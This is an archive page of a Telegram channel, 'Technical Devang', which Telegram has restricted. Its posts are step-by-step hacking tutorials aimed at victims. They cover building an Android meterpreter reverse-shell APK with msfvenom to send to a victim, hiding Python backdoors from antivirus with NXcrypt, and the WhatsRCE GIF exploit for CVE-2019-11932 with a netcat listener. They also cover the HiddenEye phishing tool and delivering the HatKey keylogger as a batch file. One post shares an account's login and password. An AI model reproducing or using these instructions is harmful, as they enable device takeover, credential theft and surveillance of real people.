en
Feedback
Technical Devang

Technical Devang

Open in Telegram

🚩 Channel was restricted by Telegram

Show more
No data
Subscribers
No data24 hours
+37 days
-430 days
Posts Archive
iky OSINT Project. Collect information from a mail. Gather, Profile, Timeline. Project iKy is to collects information from an email and shows results in a nice visual interface. Installation Clone repository git clone https://gitlab.com/kennbroorg/iKy.git Install Backend Redis You must install Redis wget http://download.redis.io/redis-stable.tar.gz tar xvzf redis-stable.tar.gz cd redis-stable make sudo make install And turn on the server in a terminal redis-server Python stuff and Celery You must install the libraries inside requirements.txt pip install -r requirements.txt And turn on Celery in another terminal, within the directory backend

Hello everyone Q&a session is on today on our Instagram page. Kindly go and ask your doubts Thank you ❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️ https://instagram.com/stories/technical_devang/2173789607426449570?utm_source=ig_story_item_share&igshid=wbety7q5ne3r

🔥HOW TO INSTALL HIDDENEYE $ pkg install python $ pkg install git $ pkg install wget $ pkg install php $ pkg install curl $ pkg install openssh $ git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git $ cd HiddenEye $ chmod 777 HiddenEye $ python3 -m pip install -r requirement.txt $ python3 HiddenEye.py

🔥 METASPLOIT INSTALLATION AND RUN COMMANDS What is payload ? A payload is a malware function of Trojan horse which transmit data from victim to attacker these type of malwares is called payload Commands : apt update apt upgrade pkg install unstable-repo pkg install metasploit After installation msfconsole Wait 2min until open msfvenom -p android/meterpreter/reverse_tcp LHOST=(your IP) LPORT=4444 R > /sdcard /shell.apk Want IP go to google search what is my IPv4 address 1st link open copy your ip Payload is on internal storage send payload to victim install it on victim mobile $ pkg install postgresql $ pg_ctl -D $PREFIX/var/lib/postgresql start msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=ip R > /sdcard/name.apk $ use exploit/multi/handler $ set payload android/meterpreter/reverse_tcp $ set LHOST $ set LPORT $ exploit

Hack.me hosts a number of vulnerable apps and allows its community to build, host and share their vulnerable application code for educational and research purposes.  Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. Hack This Site is more than just another hacker wargames site, it’s a living, breathing community with many active projects in development. Try2Hack provides several security oriented challenges for your entertainment. HackThis  is a legal and safe network security resource where users test their hacking skills on various challenges and learn more about hacking. CTF365 allows you to defend your servers and launch attacks on others, all using the exact same techniques that work in the real world. OverTheWire helps you learn and practice security concepts in the form of fun-filled games. Hacking-Lab  is providing CTF and mission style challenges for international competitions, like the European Cyber Security Challenge. Pwnable.kr is a non-commercial wargame site which provides various pwn challenges regarding system exploitation. SmashTheStack is a wargaming Network hosting several wargames.

New post Go and give comment about NSA 😍😍😍😍😍😍😍😍😍😍😍😍 https://www.instagram.com/p/B4eCahhlq8a/?igshid=1egkth9ld4jvh

NXcrypt - Encrypt Python backdoors to bypass AntiVirus NXcrypt:-    NXcrypt is a polymorphic 'python backdoors' crypter written in python by Hadi Mene (h4d3s) . The output is fully undetectable .    NXcrypt can inject malicious python file into a normal file with multi-threading system .    Run it with superuser's permissions .    NXcrypt output is Fully undetectable .    Encryption Module: Installation    git clone https://github.com/Hadi999/NXcrypt    cd NXcrypt    sudo python NXcrypt.py [options]   @technicaldevang 😍

sticker.webp0.14 KB

sticker.webp0.11 KB

photo content

Giveaway ronomeo@yandex.com 123456 After login send screenshot @Technicaldevang_bot 👍👍👍👍👍👍👍👍👍👍👍👍👍

sticker.webp0.12 KB

sticker.webp0.08 KB

New post on new attack Go and drop your love ❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️ https://www.instagram.com/p/B4U_m6OAjx-/?igshid=czslpjba3l5g

▪️WhatsApp - Generate Payload for CVE-2019-11932▪️ #whatsapphacking Auto install GCC (no harm command, you can see this is open-source) Saving to .GIF file sudo apt install git git clone https://github.com/KeepWannabe/WhatsRCE cd WhatsRCE && bash start.sh ▪️How Get Shell ? You just send the .GIF file to victim user AS A DOCUMENT NOT IMAGES And set the nc / netcat to port you set on the WhatsRCE tools {nc -lnvp your_port} You can use the Social Engineering attack so that victims can be attracted to launch this exploit tell the victim to open the gallery via whatsapp and send the victim to send any photos (no need, it's just got to the gallery no problem) after that a few seconds later you will receive a shell connection from the victim @technicaldevang

sticker.webp0.14 KB

👁‍🗨Keylogger:- for Kali Linux👁‍🗨 @technicaldevang First download this script from Here Now change the directory to the HatKey folder and expand it. Here you can see the HatKey.py script. Run the script by the command- python HatKey.py Now we have to set the host and port for the Keylogger. To see the default settings type the command 'show'. It will show you the host and port already set to. Now its time to set the host and port. As we are going to use it on our LAN we are taking the localhost but if you want to use it over WAN, use your static Public IP address and forward any unused port. We are going to use the 'set' command to set the host and port. set host set port The port is by default set to 8080 and it is okay as we are on LAN. Now run the Keylogger by the command- run The tool has generated some lines of shellcodes. Copy the codes and paste them in a text file and name it with any name you want with .bat extension. Now send the both file to the victim. As the victim clicks on the batch file it will connect with the client that is you. You will see the message "Agent connected" with the IP address of the victim. The logs will be saved in an Output folder automatically created in the HatKey folder.